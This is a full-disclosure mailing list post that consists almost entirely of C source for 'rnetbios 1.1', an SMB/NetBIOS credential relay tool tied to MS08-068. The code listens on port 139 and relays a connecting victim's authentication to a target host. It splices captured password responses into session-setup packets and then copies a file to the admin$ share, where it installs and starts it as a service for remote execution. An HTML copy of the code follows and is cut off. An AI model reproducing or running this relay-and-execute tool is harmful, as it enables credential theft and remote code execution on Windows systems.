[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] rnetbios1.1 and about ms08-068
From: yuange <yuange1975 () hotmail ! com>
Date: 2010-12-31 13:43:57
Message-ID: SNT104-W5343AF7E0C98971851A38EC4040 () phx ! gbl
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
http://hi.baidu.com/yuange1975/blog/item/c4d825ecf55f373562d09f03.html
#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <string.h>
#include <winnetwk.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"Mpr.lib")
#define BINDNUM 10
#define THREADNUM BINDNUM
#define SERVERPORT 139
#define BUFFSIZE 0x4000
typedef struct rserver{
int socketclient;
int socketserver;
int socketconnects;
int socketconnectd;
// struct sockaddr_in iprnetbios;
// struct sockaddr_in ippsexec;
SOCKET ipclient;
SOCKET iprnetbios;
SOCKET ippsexec;
SOCKET ipdest;
// BOOL rself;
// SOCKET iprnetbios;
} RSERVER;
typedef struct rnet{
int fd;
int fd2;
int fd3;
int fd4;
int long72;
int *long72add;
int long73ok;
int *long73okadd;
int recvbytes;
char *buff;
char *buff72;
char *buff73;
char *buff73ok;
char *filename;
char *namereq;
char *namereturn;
char *ipbuff;
char *namebuff;
char *buffgetname;
char *buff0x82;
BOOL loginok;
} RNET;
typedef struct psinfo{
char *ip;
char *filename;
}PSINFO;
void psexec(PSINFO *psinfo);
void rnetbios(RSERVER *rinfo);
void rnetbiosthread(void *rinfo );
void nameuncode(char *namebuff,char *ipbuff);
void changepass(char *buff,char *buff73);
int waitfd4(RNET *rnetinfo,RSERVER *rinfoadd);
BOOL rnetchangepacket(RNET *rnetinfo);
BOOL rnetchangepacket2(RNET *rnetinfo);
int newsend(int fd,char *buff,int size,int flag);
int main(int argc, char **argv)
{
RSERVER rinfo[THREADNUM];
int fd2;
int fd3[BINDNUM];
struct sockaddr_in s_in1,s_in2,s_in3,s_in4;
struct hostent *he;
int i; //,randnum;
int result;
BOOL loginhimself;
SOCKET d_ip,bindip;
WSADATA wsaData;
DWORD ThreadID;
printf("\n rnetbios ver 1.1.");
printf("\n copy by yuange 2000.4.7.");
printf("\n rcopy 2002.10.14.");
printf("\n welcome to my homepage http://yuange.yeah.net.");
printf("\n usage: %s [rnebios to ip] [rnetbios bind ip] [rnetbios bind ip2] [rnetbios client \
ip][new can netbios ip]",argv[0]); printf("\n example:%s 0 192.168.5.9 192.168.6.9 \
192.168.7.9",argv[0]); // printf("\n when somebody file:\\yourip,your host will rnetbios to \
the [ip] \n or his source ip if you haven't specified [ip] address"); // printf("\n After he \
login ,you can file:\\127.0.0.1 to the [ip] .\n "); // psexec(1);
if(argc<5){
printf("\n error!\n");
printf("\n usage: %s [rnebios to ip] [rnetbios bind ip] [rnetbios bind ip2] [rnetbios \
client ip][new can netbios ip]",argv[0]); printf("\n\n");
exit(1);
}
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(2);
}
/*
for(i=0,j=0;i<16;++i){
name=servername[i] ;
if(name==0) j=1;
if(j==1) name=0x20;
namebuff[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
namebuff[2*i+6]= (name & 0x000F) + 'A';
}
namebuff[37]=0;
*/
d_ip=-1;
d_ip = inet_addr(argv[1]);
if(d_ip==-1){
he = gethostbyname(argv[1]);
if(!he) printf("\n Can't get the ip of %s !\n",argv[1]); //server);
else memcpy(&d_ip, he->h_addr, sizeof(d_ip));
}
if(d_ip==0) d_ip=-1;
if(d_ip==-1){
loginhimself=1;
printf("\n rnetbios to the netbios ip.");
}
else {
loginhimself=0;
printf("\n rnetbios to %s",argv[1]); //server);
}
s_in1.sin_addr.s_addr=d_ip;
fd2 = socket(AF_INET, SOCK_STREAM,0);
s_in2.sin_family = AF_INET;
s_in2.sin_port = htons(SERVERPORT);
s_in2.sin_addr.s_addr = 0;
s_in2.sin_addr.s_addr = inet_addr(argv[2]);
if(s_in2.sin_addr.s_addr==0||s_in2.sin_addr.s_addr==-1){
printf("\n\n argv[2] ip error. use the ip: 192.168.0.2");
s_in2.sin_addr.s_addr = inet_addr("192.168.0.2");
}
i=bind(fd2,&s_in2, sizeof(s_in2));
if(i<0){
i=WSAGetLastError();
printf("\n bind error 0x%x",i);
exit(1);
}
i=listen(fd2,100);
if(i<0){
i=WSAGetLastError();
printf("\n bind error 0x%x",i);
exit(1);
}
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(SERVERPORT);
s_in3.sin_addr.s_addr = 0;
s_in3.sin_addr.s_addr = inet_addr(argv[3]);
if(s_in3.sin_addr.s_addr==0||s_in3.sin_addr.s_addr==-1){
printf("\n\n argv[3] ip error. use the ip: 192.168.0.3");
s_in3.sin_addr.s_addr = inet_addr("192.168.0.3");
}
bindip=s_in3.sin_addr.s_addr;
for(i=0;i<BINDNUM;++i){
fd3[i] = socket(AF_INET, SOCK_STREAM,0);
bind(fd3[i],&s_in3, sizeof(s_in3));
listen(fd3[i],10);
s_in3.sin_addr.s_addr=ntohl(htonl(s_in3.sin_addr.s_addr)+1);
}
s_in4.sin_addr.s_addr = 0;
s_in4.sin_addr.s_addr = inet_addr(argv[4]);
if(s_in4.sin_addr.s_addr==0||s_in4.sin_addr.s_addr==-1){
printf("\n\n argv[4] ip error. use the ip: 192.168.0.4");
s_in4.sin_addr.s_addr = inet_addr("192.168.0.4");
}
for(i=0;i<THREADNUM;++i){
rinfo[i].socketclient=fd2;
rinfo[i].socketserver=fd3[i];
rinfo[i].ipclient=s_in2.sin_addr.s_addr;
rinfo[i].iprnetbios=ntohl(htonl(bindip)+i);
rinfo[i].ippsexec=s_in4.sin_addr.s_addr;
rinfo[i].ipdest=d_ip;
CreateThread((LPSECURITY_ATTRIBUTES)NULL,(DWORD)0,(LPTHREAD_START_ROUTINE)rnetbiosthread,(LPVOID)&rinfo[i],(DWORD)0,(LPDWORD)&ThreadID); \
}
Sleep(0x7fffffff);
// closesocket(fd1);
closesocket(fd2);
// closesocket(fd3);
// closesocket(fd4);
WSACleanup( );
return(0);
}
void psexec(PSINFO *info)
{
/*
SECURITY_ATTRIBUTES sa;
PROCESS_INFORMATION ProcessInformation;
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
STARTUPINFO siinfo;
*/
PSINFO psinfo=*info;
NETRESOURCE lpNetResource;
int fd1,i;
// char *ip2;
char cmdstr[0x100];
char res[0x100];
char filename[0x100];
char tempfilename[0x100];
char ser[0x100];
// char *name="cc.exe";
char *user="Administrator";
char *pass="test";
SC_HANDLE scm,svc;
char *cmdstrformat="psexec.exe \\\\%s -u Administrator -p test -s cmd.exe";
// char *cmdstrformat="\\\\%s\\admin$ ";
// fd1=*(int *)(ip);
// ip2=*(int *)(ip+4)+8;
// ip2="192.168.70.29";
wsprintf(cmdstr,cmdstrformat,psinfo.ip); //"127.0.0.1"); //
GetTempPath(0x100,tempfilename);
GetTempFileName(tempfilename,NULL,NULL,tempfilename);
DeleteFile(tempfilename);
for(i=strlen(tempfilename);i>0;--i){
if(tempfilename[i]=='\\')
{
strcpy(tempfilename,tempfilename+i+1);
break;
}
}
// system(cmdstr);
// ExitThread(0);
wsprintf(res,"\\\\%s\\admin$",psinfo.ip);
wsprintf(filename,"\\\\%s\\admin$\\system32\\%s",psinfo.ip,tempfilename);
wsprintf(ser,"\\\\%s",psinfo.ip);
lpNetResource.dwScope=RESOURCE_CONNECTED;
lpNetResource.dwType =RESOURCETYPE_DISK;
lpNetResource.dwDisplayType=RESOURCEDISPLAYTYPE_SHARE;
lpNetResource.dwUsage=RESOURCEUSAGE_CONNECTABLE;
lpNetResource.lpLocalName=NULL;
lpNetResource.lpRemoteName=res;
lpNetResource.lpComment=NULL;
lpNetResource.lpProvider=NULL;
i=WNetAddConnection2A(&lpNetResource,user,pass,CONNECT_UPDATE_PROFILE);
scm=OpenSCManager(ser,NULL,SC_MANAGER_CREATE_SERVICE);
printf("\n scm=0x%x err=0x%x ip=%s",scm,GetLastError(),psinfo.ip);
svc=CreateService(scm,tempfilename,tempfilename,SERVICE_ALL_ACCESS, \
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_DEMAND_START,SERVICE_ERROR_IGNORE, \
tempfilename,NULL,NULL,NULL,NULL,NULL); if(svc==NULL) \
svc=OpenService(scm,tempfilename,SERVICE_ALL_ACCESS); printf("\n svc=0x%x \
err=0x%x",svc,GetLastError()); i=CopyFile(psinfo.filename,filename,TRUE);
printf("\n copy file error=0x%x ip=%s", GetLastError(),psinfo.ip);
i=StartService(svc,0,NULL);
printf("\n i=0x%x error=0x%x",i,GetLastError());
i=DeleteService(svc);
DeleteFile(filename);
// printf("\n cmdstr=%s\n",cmdstr);
/*
sa.nLength=12;
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE;
CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
ZeroMemory(&siinfo,sizeof(siinfo));
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput=hWritePipe1;
siinfo.hStdError =hWritePipe1;
// CreateProcess(NULL,&cmdstr,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
*/
// system(cmdstr);
// printf("\n psexec end. closesocket fd1=0x%x",fd1);
CloseServiceHandle(scm);
CloseServiceHandle(svc);
// closesocket(fd1);
// closesocket(fd2);
i=WNetCancelConnection2A(res,CONNECT_UPDATE_PROFILE,TRUE);
ExitThread(0);
printf("\n Exitthread erro1 !");
return;
}
void rnetbiosthread(RSERVER *rinfoadd)
{
RSERVER rinfo;
int i,fd1,fd2;
struct sockaddr_in s_in1,s_in2;
SOCKET dip;
rinfo=*rinfoadd;
// memcpy(&rinfo,rinfoadd,sizeof(rinfo));
dip=rinfo.ipdest;
while(1)
{
i=sizeof(struct sockaddr);
fd1=accept(rinfo.socketclient,&s_in1,&i);
if(s_in1.sin_addr.s_addr!=rinfo.ipclient)
{
if(rinfo.ipdest==-1) dip=s_in1.sin_addr.s_addr;
fd2 = socket(AF_INET, SOCK_STREAM,0);
s_in2.sin_family = AF_INET;
s_in2.sin_port = htons(SERVERPORT);
s_in2.sin_addr.s_addr = dip;
printf("\n Connect %s",inet_ntoa(s_in2.sin_addr));
if(!connect(fd2, (struct sockaddr *)&s_in2, sizeof(struct sockaddr_in)))
{
printf("\n Connect %s ok!",inet_ntoa(s_in2.sin_addr));
rinfo.socketconnects=fd1;
rinfo.socketconnectd=fd2;
rnetbios(&rinfo);
// printf("\n rnetbios return");
}
else printf("\n Connect %s error!",inet_ntoa(s_in2.sin_addr));
closesocket(fd2);
}
closesocket(fd1);
}
ExitThread(1);
}
void rnetbios(RSERVER *rinfoadd)
{
RNET rnetinfo;
RSERVER rinfo=*rinfoadd;
// PSINFO psinfo;
int fd,fd2,fd3,fd4;
struct sockaddr_in s_in1,s_in2,s_in4;
char buff[BUFFSIZE+1];
char buff72[BUFFSIZE+1];
char buff73[BUFFSIZE+1];
char buff73ok[BUFFSIZE+1];
char filename[BUFFSIZE+1];
char buff0x82[]={0x82,0,0,0};
char namereq[]={0x81,0,0,0};
// int long72=0;
u_short name;
char buffgetname[]={0x00,0x72,0x00,0x10,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x43,0x4b,0x41,0x41,0x41,0x41,0x41,0x41,0x41
,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x00,0x00,0x21,0x00,0x01};
char namebuff[]={0x81,0,0,0x44,0x20,0x45,0x4f,0x45,0x42,0x45,0x4a,0x43,0x48,0x46,0x44,0x43,0x41,0x46,0x48,0x45,0x50,0x46
,0x43,0x45,0x4d,0x45,0x45,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,00
,0x20,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x43,0x41,0x43,0x41,0x43,0x41
,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,00
};
char ipbuff[0x100];
char namereturn[]={0x82,0,0,0,0,0};
struct sockaddr addr2;
int i,j,k,exitcode;
//,k,l,ii;
// int usernameaddress1;
// int usernameaddress2;
// int strflg1,strflg2;
DWORD ThreadID;
HANDLE threadhandle=0;
// BOOL loginok;
s_in1.sin_addr.s_addr=rinfo.iprnetbios;
wsprintf(ipbuff,"%s",inet_ntoa(s_in1.sin_addr));
nameuncode(namebuff,ipbuff);
fd=fd2;
fd2=rinfo.socketconnects;
fd3=rinfo.socketconnectd;
fd4=0;
rnetinfo.fd2=fd2;
rnetinfo.fd3=fd3;
rnetinfo.fd4=fd4;
rnetinfo.buff=buff;
rnetinfo.buff72=buff72;
rnetinfo.buff73=buff73;
rnetinfo.buff73ok=buff73ok;
rnetinfo.filename=filename;
rnetinfo.buffgetname=buffgetname;
rnetinfo.ipbuff=ipbuff;
rnetinfo.namebuff=namebuff;
rnetinfo.buff0x82=buff0x82;
rnetinfo.namereq=namereq;
rnetinfo.long72add=&rnetinfo.long72;
rnetinfo.long72=0;
rnetinfo.long73okadd=&rnetinfo.long73ok;
rnetinfo.long73ok=0;
rnetinfo.loginok=FALSE;
// printf("\n Connect %s",inet_ntoa(s_in2.sin_addr));
i = 1;
ioctlsocket(fd2, FIONBIO, &i);
i = 1;
ioctlsocket(fd3, FIONBIO, &i);
i = 1;
ioctlsocket(rinfo.socketserver, FIONBIO, &i);
ThreadID=0;
memset(buff,0,BUFFSIZE);
memset(filename,0,BUFFSIZE);
while(1)
{
if(rnetinfo.loginok==TRUE)
{
i=GetExitCodeThread(threadhandle,&exitcode);
if(i==1&&exitcode!=STILL_ACTIVE){
// printf("\n psexec exit 0x%x code",exitcode);
break;
}
}
Sleep(5);
// if(rnetinfo.loginok==TRUE) recv(fd2,buff,BUFFSIZE,0);
i=recv(fd,buff,BUFFSIZE,0);
if(i<=0&&WSAGetLastError()==0x2746) {
// printf("\n recv fd 0x%x bytes. error=0x2746",i);
break;
}
if(i>0)
{
rnetinfo.recvbytes=i;
if(rnetchangepacket(&rnetinfo)==TRUE)
{
threadhandle=waitfd4(&rnetinfo,&rinfo);
}
memset(buff,0,BUFFSIZE);
}
i=recv(fd3,buff,BUFFSIZE,0);
if(i<=0&&WSAGetLastError()==0x2746) {
// printf("\n recv fd3 0x%x bytes. error=0x2746",i);
break;
}
if(i>0)
{
rnetinfo.recvbytes=i;
if(rnetchangepacket2(&rnetinfo)==TRUE)
{
threadhandle=waitfd4(&rnetinfo,&rinfo);
}
memset(buff,0,BUFFSIZE);
}
if(rnetinfo.loginok==FALSE) fd=fd2;
else fd=rnetinfo.fd4;
rnetinfo.fd=fd;
}
closesocket(fd2);
closesocket(fd3);
closesocket(rnetinfo.fd4);
CloseHandle(threadhandle);
return;
}
void nameuncode(char *namebuff,char *ipbuff)
{
int i,j;
u_short name;
char servername[]={"*SMBSERVER"};
for(i=0,j=0;i<16;++i){
name=ipbuff[i]; //servername[i] ;
if(name==0) j=1;
if(j==1) name=0x20;
namebuff[2*i+0x27]= ( (name >> 4) & 0x000F ) + 'A';
namebuff[2*i+0x28]= (name & 0x000F) + 'A';
}
for(i=0,j=0;i<16;++i){
name=servername[i] ;
if(name==0) j=1;
if(j==1) name=0x20;
namebuff[2*i+5]= ( (name >> 4) & 0x000F ) + 'A';
namebuff[2*i+6]= (name & 0x000F) + 'A';
}
namebuff[0x25]=0;
namebuff[0x47]=0;
return;
}
int newsend(int fd,char *buff,int size,int flag)
{
int j;
int i = 0;
ioctlsocket(fd, FIONBIO, &i);
j=send(fd,buff,size,flag);
i = 1;
ioctlsocket(fd, FIONBIO, &i);
return j;
}
void changepass(char *buff11,char *buff7311)
{
char *buff=*(int *)buff11;
char *buff73=*(int *)buff7311;
int usernameaddress1;
int usernameaddress2;
int strflg1,strflg2;
u_short name;
memcpy(buff+0x41,buff73+0x41,0x18);
// copy password
if(buff[0x35]==0x18) memcpy(buff+0x41+0x18,buff73+0x41+0x18,0x18);
// copy the next password
strflg1=buff73[0x0f];
strflg1&=0x80;
if(strflg1!=0) strflg1=1;
strflg2=buff[0x0f];
strflg2&=0x80;
if(strflg2!=0) strflg2=1;
//str is unicode ?
usernameaddress1=0x41+0x18+buff73[0x35]+strflg1;
usernameaddress2=0x41+0x18+buff[0x35]+strflg2;
name=1;
while(name!=0){
name=buff73[usernameaddress1];
if(strflg1==0) ++usernameaddress1;
else usernameaddress1+=2;
buff[usernameaddress2]=name;
++usernameaddress2;
if(strflg2!=0) {
++usernameaddress2;
buff[usernameaddress2]=0;
}
}
// copy user name £¬²»¹»ÑϽ÷£¬²»¹ýÃãÇ¿ÄÜÓá£
}
BOOL rnetchangepacket(RNET *rnetinfoadd)
{
char filename[0x100];
unsigned char name;
int i,j,k;
RNET rnetinfo=*rnetinfoadd;
if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32)
{
i=*(WORD *)(rnetinfo.buff+0x41);
if(i==0x05&&rnetinfo.recvbytes>0x4e&&rnetinfo.buff[0x4e]!=0)
{
memcpy(rnetinfo.filename,rnetinfo.buff+0x4e,rnetinfo.recvbytes-0x4e);
// *(int *)(rnetinfo.buff+9)=0xc0000016;
// rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
// closesocket(rnetinfo.fd2);
printf("\n get file name ok!");
return(TRUE);
}
if(i==0x01&&rnetinfo.recvbytes>0x54&&rnetinfo.buff[0x54]!=0)
{
memcpy(rnetinfo.filename,rnetinfo.buff+0x54,rnetinfo.recvbytes-0x54);
// *(int *)(rnetinfo.buff+9)=0xc0000016;
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
// closesocket(rnetinfo.fd2);
printf("\n get file name ok!");
return(TRUE);
}
}
if(rnetinfo.buff[0x8]==0x72)
{
if(rnetinfo.loginok==FALSE)
{
// memcpy(rnetinfo.buff72,rnetinfo.buff,rnetinfo.recvbytes);
memset(rnetinfo.buff+0xc,0,4);
rnetinfo.long72=rnetinfo.recvbytes;
//Õâ¶ùÊÇϵͳ֧³Öʲô·þÎñµÄ±ê¼Ç£¬WIN2000ÓëWINNTϵͳ²»Ò»Ñù¡£
//ÓÐÒ»·½ÊÇWINNT¿´Ò»°ã¾ÍÊÇ0£¬¶øÁ½·½¶¼ÊÇWIN2000ºóÃæÐÒéµÄÃÜ ë·½Ê½¾Í²»Ò»Ñù¡£
//ÉèÖóÉ0£¬ÆÛÆÈÃÆäÒÔWINNTµÄ·½Ê½·¢ËͼÓÃܵÄÃÜ ë£¬ÒԺýػñ¡£µ«¿ÉÄÜWIN2000Ö§³Ö²»ºÃ¡£
// printf("\n fd2 recv smb 0x72 packet ");
}
else
{
memcpy(rnetinfo.buff72+0x1c,rnetinfo.buff+0x1c,8);
memcpy(rnetinfo.buff,rnetinfo.buff72,rnetinfo.long72);
// printf("\n send smb 0x72 packet .");
rnetinfo.buff[0x25]=5;
//run in win9x.the win9x netbios client use
//Õâ¶ù¿Í»§¶Ë¿ÉÄÜÒªWIN9X£¬²»ÖªµÀWINT¡£WIN2000Ôõô´¦Àí¡£
newsend(rnetinfo.fd,rnetinfo.buff,rnetinfo.long72,0);
return(FALSE);
rnetinfo.recvbytes=0;
}
}
if(rnetinfo.buff[0x8]==0x73||rnetinfo.buff[0x8]==0x75)
{
if(rnetinfo.loginok==FALSE)
{
if(rnetinfo.buff[0x33]==0x18)
{
memcpy(rnetinfo.buff73,rnetinfo.buff,rnetinfo.recvbytes);
}
i=*(WORD *)(rnetinfo.buff+0x27);
if(rnetinfo.buff[0x8]==0x75) i=0x20;
j=*(unsigned char *)(rnetinfo.buff+0x4+i);
i+=*(WORD *)(rnetinfo.buff+i+0x0b);
i=i+2*j+7;
memcpy(filename,rnetinfo.buff+i,sizeof(filename));
j=1;
if(filename[1]==0) j=2;
for(i=0,k=0;i<0x100;i+=j,++k)
{
name=filename[i];
filename[k]=name;
// if(i==0&&name=='\\') k-=1;
}
for(i=strlen(filename);i>0;--i)
{
name=filename[i];
if(name=='\\')
{
strcpy(filename,filename+i+1);
break;
}
}
if(strcmp(filename,"IPC$")!=0&&strcmp(filename,"ADMIN$")!=0)
{
strcpy(rnetinfo.filename,filename);
printf("\n file name=%s",filename);
// closesocket(rnetinfo.fd2);
// printf("\n the new get file name ok!");
return(TRUE);
}
}
else{
if(rnetinfo.buff[0x33]==0x18)
{
// printf("\n send login ok packet.");
// printf("\n send login ok packet.");
// newsend(rnetinfo.fd,rnetinfo.buff73ok,rnetinfo.long73ok,0);
// return;
changepass(&rnetinfo.buff,&rnetinfo.buff73);
memcpy(rnetinfo.buff+0x20,rnetinfo.buff73ok+0x20,2); //user id
}
}
}
if(memcmp(rnetinfo.buff,rnetinfo.namereq,3)==0)
{
if(rnetinfo.loginok==FALSE)
{
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.namebuff,0x48,0);
// printf("\n send fd3 0x%x 0x%x bytes.",rnetinfo.namebuff[0],rnetinfo.recvbytes);
}
else
{
rnetinfo.recvbytes=newsend(rnetinfo.fd,rnetinfo.buff0x82,0x6,0);
// rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.namebuff,0x48,0);
// printf("\n send fd3 0x%x 0x%x bytes.",rnetinfo.namebuff[0],rnetinfo.recvbytes);
}
}
else
{
if(rnetinfo.loginok==FALSE) \
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0); else
{
// memcpy(rnetinfo.buff73+0x1c,rnetinfo.buff73ok+0x1c,8);
rnetinfo.recvbytes=newsend(rnetinfo.fd3,rnetinfo.buff,rnetinfo.recvbytes,0);
}
// printf("\n send fd3 0x%x 0x%x bytes.",rnetinfo.buff[8],rnetinfo.recvbytes);
}
return(FALSE);
}
BOOL rnetchangepacket2(RNET *rnetinfoadd)
{
RNET rnetinfo=*rnetinfoadd;
if(rnetinfo.buff[0x8]==0x72)
{
if(rnetinfo.loginok==FALSE){
memcpy(rnetinfo.buff72,rnetinfo.buff,rnetinfo.recvbytes);
// memset(rnetinfo.buff+0xc,0,4);
*rnetinfo.long72add=rnetinfo.recvbytes;
}
}
if(rnetinfo.buff[0x8]==0x73||rnetinfo.buff[0x8]==0x75)
{
if(*(int \
*)(rnetinfo.buff+9)==0&&rnetinfo.buff73[0x33]==0x18&&rnetinfo.loginok==FALSE) {
memcpy(rnetinfo.buff73ok,rnetinfo.buff,rnetinfo.recvbytes);
*rnetinfo.long73okadd=rnetinfo.recvbytes;
// rnetinfo.loginok=TRUE;
// closesocket(rnetinfo.fd2);
printf("\n now login ok!");
// rnetinfo.recvbytes=0;
// return(TRUE);
}
}
if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32&&rnetinfo.buff[9]!=0&&rnetinfo.buff73[0x33]==0x18)
{
// *(int *)(rnetinfo.buff+9)=0xc0000016;
}
rnetinfo.recvbytes=newsend(rnetinfo.fd,rnetinfo.buff,rnetinfo.recvbytes,0);
if(rnetinfo.loginok==FALSE&&rnetinfo.buff[0x8]==0x32&&rnetinfo.buff[9]!=0&&rnetinfo.buff73[0x33]==0x18)
{
// closesocket(rnetinfo.fd2);
// return(TRUE);
}
// printf("\n send fd 0x%x 0x%x bytes.",rnetinfo.buff[8],rnetinfo.recvbytes);
return(FALSE);
}
int waitfd4(RNET *rnetinfo,RSERVER *rinfoadd)
{
// RNET rnetinfo=*rnet;
RSERVER rinfo=*rinfoadd;
int i,j,k,threadhandle,exitcode;
unsigned char name;
char *ipbuff[0x100];
PSINFO psinfo;
struct sockaddr_in s_in1,s_in2,s_in4;
struct sockaddr addr2;
DWORD ThreadID;
rnetinfo->loginok=TRUE;
s_in1.sin_addr.s_addr=rinfo.iprnetbios;
wsprintf(ipbuff,"%s",inet_ntoa(s_in1.sin_addr));
psinfo.ip=&ipbuff;
/*
i=*(WORD *)(rnetinfo->buff73+0x27);
j=*(unsigned char *)(rnetinfo->buff73+0x4+i);
i+=*(WORD *)(rnetinfo->buff73+i+0x0b);
i=i+2*j+7;
psinfo.filename=rnetinfo->buff73+i;
j=1;
if(psinfo.filename[1]==0) j=2;
for(i=0,k=0;i<0x100;i+=j,++k)
{
name=psinfo.filename[i];
psinfo.filename[k]=name;
// if(i==0&&name=='\\') k-=1;
}
for(i=strlen(psinfo.filename);i>0;--i)
{
name=psinfo.filename[i];
if(name=='\\')
{
strcpy(psinfo.filename,psinfo.filename+i+1);
break;
}
}
*/
psinfo.filename=rnetinfo->filename;
j=1;
if(rnetinfo->filename[1]==0) j=2;
for(i=0,k=0;i<0x100;i+=j,++k)
{
name=rnetinfo->filename[i];
rnetinfo->filename[k]=name;
if(i==0&&name=='\\') k-=1;
}
printf("\n filename=%s\n",psinfo.filename);
threadhandle=CreateThread((LPSECURITY_ATTRIBUTES)NULL,(DWORD)0,(LPTHREAD_START_ROUTINE)psexec,(LPVOID)&psinfo,(DWORD)0,(LPDWORD)&ThreadID);
// break;
while(1){
Sleep(5);
if(rnetinfo->loginok==TRUE)
{
i=GetExitCodeThread(threadhandle,&exitcode);
if(i==1&&exitcode!=STILL_ACTIVE){
// printf("\n psexec exit 0x%x code",exitcode);
break;
}
}
i=sizeof(struct sockaddr);
rnetinfo->fd4=accept(rinfo.socketserver,&addr2,&i);
memcpy(&s_in4,&addr2,15);
if(rnetinfo->fd4>0)
{
if(s_in4.sin_addr.s_addr!=rinfo.ippsexec){
printf("\n fd4 error.");
closesocket(rnetinfo->fd4);
}
else
{
printf("\n fd4 ok! ip=%s",ipbuff);
break;
}
}
}
return(threadhandle);
}
[Attachment #5 (text/html)]
<html>
<head>
<style><!--
.hmmessage P
{
margin:0px;
padding:0px
}
body.hmmessage
{
font-size: 10pt;
font-family:΢ÈíÑźÚ
}
--></style>
</head>
<body class='hmmessage'>
<BR>
<BR>
<A href="http://hi.baidu.com/yuange1975/blog/item/c4d825ecf55f373562d09f03.html">http://hi.baidu.com/yuange1975/blog/item/c4d825ecf55f373562d09f03.html</A><BR>
<BR>
<BR>
<BR>
<BR>#include <windows.h> <BR>#include <winsock.h><BR>#include \
<stdio.h><BR>#include <string.h><BR>#include <winnetwk.h><BR>#pragma \
comment(lib,"ws2_32")<BR>#pragma comment(lib,"Mpr.lib")<BR> <BR>#define \
BINDNUM 10<BR>#define THREADNUM \
BINDNUM<BR>#define SERVERPORT 139<BR>#define \
BUFFSIZE 0x4000<BR> typedef struct rserver{<BR> \
<BR> int socketclient;<BR> int socketserver;<BR> int \
socketconnects;<BR> int socketconnectd;<BR> <BR> // struct sockaddr_in \
iprnetbios;<BR>// struct sockaddr_in ippsexec;<BR> SOCKET \
ipclient;<BR> SOCKET iprnetbios;<BR> SOCKET \
ippsexec;<BR> SOCKET ipdest;<BR>// BOOL rself;<BR>// \
SOCKET iprnetbios;<BR> } RSERVER;<BR>
<BR>
typedef struct rnet{<BR>
<BR> int fd;<BR> int fd2;<BR> \
int fd3;<BR> int fd4;<BR> int \
long72;<BR> int *long72add;<BR> \
int long73ok;<BR> int \
*long73okadd;<BR> int recvbytes;<BR> char *buff;<BR> char \
*buff72;<BR> char *buff73;<BR> char *buff73ok;<BR> char \
*filename;<BR> char *namereq;<BR> char \
*namereturn;<BR> char *ipbuff;<BR> char *namebuff;<BR> char \
*buffgetname;<BR> char *buff0x82;<BR> <BR> BOOL loginok;<BR>
<BR>} RNET;<BR>
typedef struct psinfo{<BR> <BR> char *ip;<BR> char *filename;<BR>
}PSINFO;<BR>
<BR>
<BR>void psexec(PSINFO *psinfo);<BR>void rnetbios(RSERVER \
*rinfo);<BR>void rnetbiosthread(void *rinfo );<BR>void nameuncode(char \
*namebuff,char *ipbuff);<BR>void changepass(char *buff,char \
*buff73);<BR>int waitfd4(RNET *rnetinfo,RSERVER *rinfoadd);<BR> \
BOOL rnetchangepacket(RNET *rnetinfo);<BR>BOOL rnetchangepacket2(RNET \
*rnetinfo);<BR> <BR>int newsend(int fd,char *buff,int size,int flag);<BR>
int main(int argc, char **argv)<BR>{<BR>
RSERVER rinfo[THREADNUM];<BR>
int fd2;<BR> int \
fd3[BINDNUM];<BR> struct sockaddr_in s_in1,s_in2,s_in3,s_in4;<BR> \
struct hostent *he;<BR> int i; \
//,randnum; <BR> int result;<BR> \
BOOL loginhimself;<BR> SOCKET d_ip,bindip;<BR> \
<BR> WSADATA wsaData;<BR> DWORD ThreadID; <BR> \
<BR> printf("\n rnetbios ver 1.1.");<BR> printf("\n copy by yuange \
2000.4.7.");<BR> printf("\n rcopy 2002.10.14.");<BR> printf("\n welcome to my \
homepage <A href="http://yuange.yeah.net/">http://yuange.yeah.net</A>.");<BR> printf("\n \
usage: %s [rnebios to ip] [rnetbios bind ip] [rnetbios bind ip2] [rnetbios client ip][new can \
netbios ip]",argv[0]);<BR> printf("\n example:%s 0 192.168.5.9 192.168.6.9 192.168. \
7.9",argv[0]); <BR>// printf("\n when somebody <A \
href="file://yourip,your/">file:\\yourip,your</A> host will rnetbios to the [ip] \n or his \
source ip if you haven't specified [ip] address");<BR>// printf("\n After he login ,you \
can <A href="file://127.0.0.1/">file:\\127.0.0.1</A> to the [ip] .\n ");<BR> \
